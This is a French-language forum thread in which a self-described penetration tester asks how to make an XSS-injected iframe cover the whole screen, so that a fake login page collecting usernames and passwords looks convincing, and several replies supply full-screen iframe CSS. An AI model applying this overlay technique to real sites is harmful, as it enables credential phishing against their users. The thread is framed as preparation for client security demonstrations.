Création d'un iframe plein écran
Je suis actuellement à la recherche d'attaques XSS, dans le but de les utiliser dans des démonstrations clients (je suis testeur de stylo). J'ai écrit un outil qui hébergera une version malveillante de la page de connexion d'un site Web (qui récolte les noms d'utilisateur et les mots de passe), puis redirige la victime vers le site Web d'origine. Cependant, j'ai essayé de le faire fonctionner à l'aide d'iframes à la place, car cela semblerait beaucoup plus convaincant car l'url ne changera pas.
J'ai cherché sur Google et cela semble être le code approprié:
<iframe src="http://192.168.0.1/login.php" style="border: 0; width: 100%; height: 100%">
mais l'iframe créé n'est en aucun cas en plein écran (sur Internet Explorer et Firefox). Voici une capture d'écran
Comme vous pouvez le voir, la page de connexion iframe est sous le "quel est votre nom?" zone, donc nulle part près du plein écran. J'ai essayé de modifier le fichier css de la page de connexion malveillante, pour inclure les paramètres plein écran, mais cela n'a aucun effet non plus.
Quelqu'un a-t-il des solutions? Merci!
Non testé, mais essayez ceci:
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:absolute; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
ou
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
Ce code fonctionne:
<html>
<head>
<style type="text/css">
body
{
margin: 0;
overflow: hidden;
}
#iframe1
{
height: 100%;
left: 0px;
position: absolute;
top: 0px;
width: 100%;
}
</style>
</head>
<body>
<iframe id="iframe1" src="HERE PLACE YOUR URL" frameborder="0"></iframe>
</body>
</html>